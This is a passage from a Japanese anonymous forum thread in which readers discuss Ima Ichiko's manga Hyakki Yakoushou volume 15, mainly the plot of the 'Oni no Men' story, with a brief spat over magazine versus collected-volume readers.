あーあ、せっかく友達になれたのに、なんて思っちゃってw

結局、三井さんと夏希の友人関係はどうなった?

319 :花と名無しさん:2007/01/24(水) 01:41:57 ID:???0
佐藤兄は、近藤家あるいは近藤妻をストーキングしてて、
近藤家に不法侵入してたのかと思った。
顔を隠すため、なぜか鬼の面着装。



320 :花と名無しさん:2007/01/24(水) 01:41:59 ID:???0
>三井さんと夏希の友人関係
その辺が全く触れられてないのも気になるよね。
あのモノローグからして夏希死んでないよ派なんだけど、生きてるにしろ
目の前で首吊り&殺されかけたらさすがに天然でやり過ごせないような。
個人的に万事解決しない所(超能力万能!じゃない)が百鬼のいいとこだなーと思ってるんだけど
この回は律の友人の恋人の友達だからなー。

321 :花と名無しさん:2007/01/24(水) 01:46:41 ID:???0
>>319
うーんそれは説明がなさすぎるような。
近藤が近所をうろつく佐藤兄を自分のスパイと思い込む=「他人は己を映す鏡」のテーマ
が薄くなっちゃうし。

322 :花と名無しさん:2007/01/24(水) 02:05:09 ID:???0
>>308
>ストーカー兄貴が身代わりになったと予想

その可能性あるね。
佐藤妹が、夏希と佐藤母を捜しに出かけようとしたとき、部屋から
顔出して話聞いてた様子だから、後をつけてきてたかもしれない。

323 :花と名無しさん:2007/01/24(水) 03:34:57 ID:???0
グレンスミスの呪いは着実に進行してるよねw

324 :花と名無しさん:2007/01/24(水) 08:26:15 ID:???0
夏希が最初に出会った鬼が誰だかよくわからない。
家の主である中年の近藤、或いは彼の悪霊かと思ったんだけど、
あのジャンパーの説明がつかないんだよね。
夏希死亡説に立って、最期に見た光景(息子のジャンパー着用して吊るされた佐藤母)を
夏希が予知で見てしまったのかと思ったんだけど、ズボン他衣類が違う・・・


>個人的に万事解決しない所(超能力万能!じゃない)が百鬼のいいとこだなーと思ってるんだけど
ハゲドウ。赤間や他妖魔との対決ものではなく、あくまで「飯嶋家の日常」って所が面白い

325 :花と名無しさん:2007/01/24(水) 09:33:57 ID:???0
ネムキで新作が出た後より
単行本が出た後の方がスレが活発になるのを見ると
つくづく雑誌読んでない人の方が多いんだなーと実感する

326 :花と名無しさん:2007/01/24(水) 09:43:53 ID:???0
>>325
うん。単行本派なので雑誌はチェックしてないっす。

327 :花と名無しさん:2007/01/24(水) 12:40:31 ID:???0
>>325
基本的に怖い漫画は苦手なんだよ…
市さんの漫画だから読んでるけど
怖すぎて読めない話もある。

328 :花と名無しさん:2007/01/24(水) 13:47:36 ID:???0
>>325
雑誌でチェックしてない派は蔑むべき存在なん?

329 :花と名無しさん:2007/01/24(水) 13:49:38 ID:???0
>>蔑むべき存在
誰がんなこと言ったよ
頭悪いのか

330 :花と名無しさん:2007/01/24(水) 13:54:04 ID:???0
>>328
さげすむべきとかそういうことじゃなく
328が雑誌を読んで語りたくてうずうずしてる時には
誰も盛り上がってなくて
数ヶ月経って気持ちが沈静化してしまっている頃に
単行本で読んだ人たちが盛り上がっているという状況の
タイムラグとかギャップとかがあって「さびしい」と感じている
とかそういうことじゃないかと。

331 :花と名無しさん:2007/01/24(水) 14:04:20 ID:???0
佐藤家の誰かが犠牲になったまでは考えられないなあ
さすがにそれはやりすぎつーか無理矢理ぽい
ラストが>>310も書いてるけどバットで打たれてるのを防いでる格好だから、
「普通は」「たいがいは」周りが犠牲になるけど、今回は皮肉にも自分に
振りかかってしまった稀なケースってのをかいてるんじゃないかと…
冒頭の、佐藤兄のコートを着た般若の面の人についてはわからん

332 :花と名無しさん:2007/01/24(水) 14:06:16 ID:???0
>>330
d、なるほど。イヤミな人だな。>329&325
どう取られるかなんて自分の文章にも責があるのに、頭悪いヤシ。

333 :花と名無しさん:2007/01/24(水) 14:10:50 ID:???0
頭悪い云々まではどうかと思うけど、単行本で読む人達にチクリとした
嫌味も含んでるのかな?と邪推しちゃう気持ちもまあわかる

334 :花と名無しさん:2007/01/24(水) 14:20:09 ID:???0
>>332の方がイヤミな件

335 :花と名無しさん:2007/01/24(水) 14:21:52 ID:???0
漫画雑誌の編集をしてる知り合いがいるが
・アンケートは悪いが単行本化するとセールスはよい漫画
・アンケートは常に上位だが単行本化してもあまり売れない漫画
この二つだと前者のほうがいい漫画なんだそうで
実際、連載開始からずっとアンケ最下位をつっぱしっているのだが
単行本にすると売れる漫画ってのは打ち切られなくて
アンケは常に4位以内にはいるけど単行本の売れ行きがさっぱりな漫画は
打ち切られたりするらしい。
もっともその漫画が載ってる号と載ってない号で売り上げが変わるほどの漫画なら
単行本が売れなくても(そんなことはまずないが)切られることはないんだそうで。
(ちなみにその編集さんは、週刊少年誌ではないです。)

なので、その漫画のために雑誌を買ってあげなきゃいかんとかアンケート書いてあげなきゃいかんとか
そういうのはそれほどシビアに思わなくていいのだそうな。

そんなこんなで私は大手を振って単行本派。

336 :花と名無しさん:2007/01/24(水) 14:27:41 ID:???0
まあ、328とか332が変な罪悪感を抱いてるってことなんだろうな。
普通は、325を読んでさげすんでるとかバカなこと考えないし。
私は単行本派だけど、325読んでも、普通にこのスレの現状を
書いてるとしか思わなかったし。

337 :花と名無しさん:2007/01/24(水) 14:28:35 ID:???0
>>336
悔しいのは分かったし、もういいから…乙。

338 :花と名無しさん:2007/01/24(水) 14:30:33 ID:???0
ファミレスの男は「ゴキブリ」の話をした直後だったし、三井の悪意なんだろうな。
自分は中年近藤の「鬼が棲んでる」って言葉が気になる。
近藤自身も鬼に遭遇してたような言い回しだし、
もしかすると、鬼の面は近藤の家にあったりして。
だとすると、律と住職の判断が外れてても合点がいく。いや、わざと矛盾させてるのかもわからんが。
冒頭のコートの件はやっぱりわからん。
あと、最終話の黒天井の時系列も複雑で難しいです・・・

339 :花と名無しさん:2007/01/24(水) 14:30:57 ID:???0
>>337
そういう根拠のない決めつけ止めなよ。
荒れる元だよ?

340 :花と名無しさん:2007/01/24(水) 14:32:09 ID:???0
まだ単行本買えてないんだけど、鶏の話入ってないって本当ですか?

341 :花と名無しさん:2007/01/24(水) 14:32:37 ID:???0
>>337必死だなw

342 :花と名無しさん:2007/01/24(水) 14:34:13 ID:???0
>>339
分かったからお前もやめとけよ

343 :花と名無しさん:2007/01/24(水) 14:34:37 ID:???0
>>342必死すぎwww

344 :花と名無しさん:2007/01/24(水) 14:36:26 ID:???0
>>342
私も最初に煽った>>332が悪いと思うよ。
>>325からは別に悪意は感じなかったし・・・・

こんな風に書くと、また同一人物だって言われるのかな

345 :花と名無しさん:2007/01/24(水) 14:37:32 ID:???0
子供のけんかみたくなってきたな。

346 :花と名無しさん:2007/01/24(水) 14:38:24 ID:???0
>>344
つ変な人はスルー

347 :花と名無しさん:2007/01/24(水) 14:38:38 ID:???0
>>340
本当

348 :花と名無しさん:2007/01/24(水) 14:39:28 ID:???0
夜に来る人が
「妙にスレが伸びてると思ったら…」と
あきれるんだろうな。

349 :花と名無しさん:2007/01/24(水) 14:44:25 ID:???0
>>344
概ね同意。あと329も沸点低すぎとは思う。
変な風に捉えられたら相手を頭悪いって…ナンダカナーとあきれた。

350 :花と名無しさん:2007/01/24(水) 15:10:05 ID:SmzdNV860
単行本話したい人のために上げとこう

351 :花と名無しさん:2007/01/24(水) 16:03:05 ID:???0
>>338
>「鬼が棲んでる」って言葉
そこは実際鬼に会ったとか、鬼の面があったとかそういう直接的なことでなく
自分の中の鬼(悪意や、大学生近藤と対極的な「人を見たら泥棒と思え」な猜疑心)を
皆に暴かれた、言いふらされたって事でいいと思う。
どっちにしろ冒頭の鬼のコートが説明つかないから、
近藤の悪意と夏希の悪霊が見せた悪い予知が混ざったもの…て解釈かな。
最初は近藤本人(鬼の面は夏希にしか見えていない)かな〜と思ったけど
一言も喋らないのはおかしいし、コートはもっとおかしいし。

352 :338:2007/01/24(水) 16:38:59 ID:???0
>>351
確かに、よく考えてみると、近藤が鬼(自分の憎悪)に遭遇してたら、
三井みたいなリアクションになって、あの家から逃げてるだろうしね。
因果応報ではなく偶然の積み重ねがテーマだし、338の推測は無理があるか。
冒頭の鬼は、351さんと同意見です。
近藤が会社にいたってのは警察もウラをとってあるだろうし、
佐藤母の着用してた衣類と、冒頭の鬼が着用してた衣類が微妙に違うのは
夏希の予知能力の誤差ってところかな。

353 :花と名無しさん:2007/01/24(水) 17:39:40 ID:???0
最新巻読んだけど、やっぱり今市子さん上手いな〜
百鬼で怖いと思ったことはあまり無いけど、「鬼の面」は
ラスト6ページの陰惨な展開で久々に怖かった。
「野に放たれて」は翔にとっては時間が断絶してポンポン飛んでしまう、
タイムスリップのような体験をしていくトリップ感と、
「今日は何日飛んでるんだ?」というセリフが小林泰三の「酔歩する男」を連想した。
「緋い糸」のタートル関口は最初、矢野ミズキさん再登場か!?と思ってしまった。
「黒天井」も >>338 さんと同じくもう一回読み返さないと・・
いや15巻はいつにも増して面白いわ。


354 :花と名無しさん:2007/01/24(水) 18:23:13 ID:???O
冒頭の鬼は佐藤父の部下の悪意かと思ってた
間違えて別の佐藤一家を殺した犯人
でもコートから考えると佐藤母の殺害された姿を予知したって方が自然か

ネムキで読んだときに鬼の顔が怖くて軽くトラウマくらったのを単行本で思い出した…orz
面の絵より三井と佐藤母の顔が鬼になってるシーンのが怖い
箱庭・人形の家と並ぶよ…

355 :花と名無しさん:2007/01/24(水) 18:35:08 ID:???0
>>352
うん、夏希が入った家が会社員の近藤じゃなかったら、
「鬼の面被った変質者がうちに!?こわっ!」とか「変な事言う女だな〜虚言癖か?」とか
思って終わりだろうし。偶然、もしくはたまたま夏希がつれていた悪霊と波長?があって
近藤家に入ってしまった(そこからどんどん広がって…)っていう
「因果応報なんてない(ただ偶然と運と縁があるだけ)」話だと思う。

356 :花と名無しさん:2007/01/24(水) 20:03:14 ID:???0
妙にスレが伸びてると思ったら…

357 :花と名無しさん:2007/01/24(水) 20:16:34 ID:???0
司ちゃんの彼氏・ホッシーと近藤くんの容姿が似てる・・・

358 :花と名無しさん:2007/01/24(水) 21:02:42 ID:???0
律の友人が近藤なのになんでおっさんの名字を近藤にするんだ
混同するじゃないか

359 :花と名無しさん:2007/01/24(水) 21:08:44 ID:???0
>358
佐藤から近藤の名前を連想して近藤家に入っちゃったんだからね〜
だから合コンセッティングよろ!みたいな台詞があったっしょ?

360 :花と名無しさん:2007/01/24(水) 21:20:05 ID:???0
>佐藤から近藤の名前を連想して近藤家に入っちゃったんだから

意味不明
今さんボケたのか

361 :花と名無しさん:2007/01/24(水) 22:14:05 ID:???0
三井さんと夏希の友情関係なんだけど、
夏希が生きてたとしても、三井さんは夏希とは距離をおくようになってると思う。
近藤くんが知った程の詳細を三井さんも教えてもらえたかどうかはわからないけど、
自分の深層心理が関係した事は察するだろうし、律の忠告の意味もわかったんじゃないかな。

夏希が死亡してたとしても、事件からコートの要らない季節まで時間が流れてる事と、
三井さんの側には癒し系彼氏の近藤くんがいるから、そうは影を引っ張らずにすんでそう。

結論:三井さんの様子から夏希がどうなったかを推測するのは難しい

362 :花と名無しさん:2007/01/24(水) 22:48:16 ID:???0
>>360
ド天然だから文字もフワァとしか見てないとか。
自分も昔、ハンドルネーム「まじんごう」って人を
「まんじろう」さんってずっと勘違いしてた事あったな・・

363 :花と名無しさん:2007/01/24(水) 23:07:26 ID:???0
でも変な説明だよな。と自分も思った<佐藤から近藤の名前を連想して近藤家に入っちゃった

364 :花と名無しさん :2007/01/24(水) 23:07:54 ID:???0
赤い糸の話、律はタートル関口の首の糸は見えるのに
自分の腕の糸は見えなかったのか??

365 :花と名無しさん:2007/01/24(水) 23:22:31 ID:???0
>>357
似てる。
ちょっとキャラもかぶる。

366 :花と名無しさん:2007/01/24(水) 23:33:28 ID:???0
右足のないわんこが可愛かったw

367 :花と名無しさん:2007/01/25(木) 00:02:28 ID:???0
>>364
見えてたけど自衛できるから気にしないようにしてたのかと思った。

368 :花と名無しさん:2007/01/25(木) 00:31:16 ID:???0
>>360,363
合コンのセッティングを頼むために
その場の思いつきで言った後付け(含む天然なりのギャグ)なのかなーと。

369 :花と名無しさん:2007/01/25(木) 00:35:52 ID:???0
「鬼の面」冒頭の般若は、怨霊が夏希に対して復讐の予告をしてたんじゃないのかなーと思った。
あんまりストレートなやり方じゃ怨念が通じないもんだから、
あれをこうして、この憎悪をこう繋げて…みたいに組み立てたら何か上手く行きそうな具合。
ちょっと嬉しくなっちゃったからサービスして先に教えてしまったとか…
「あんた後でこれみるからね、覚えといてね」てな感じで。


370 :花と名無しさん:2007/01/25(木) 00:43:06 ID:???0
それだと全く偶然ではなくなり、因果応報に近い設定になって、テーマとズレる気がするな。

371 :花と名無しさん:2007/01/25(木) 02:58:26 ID:NNqYewVu0
今先生の出身の東京女子大には、民俗学専攻ってあるのかな?

76 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)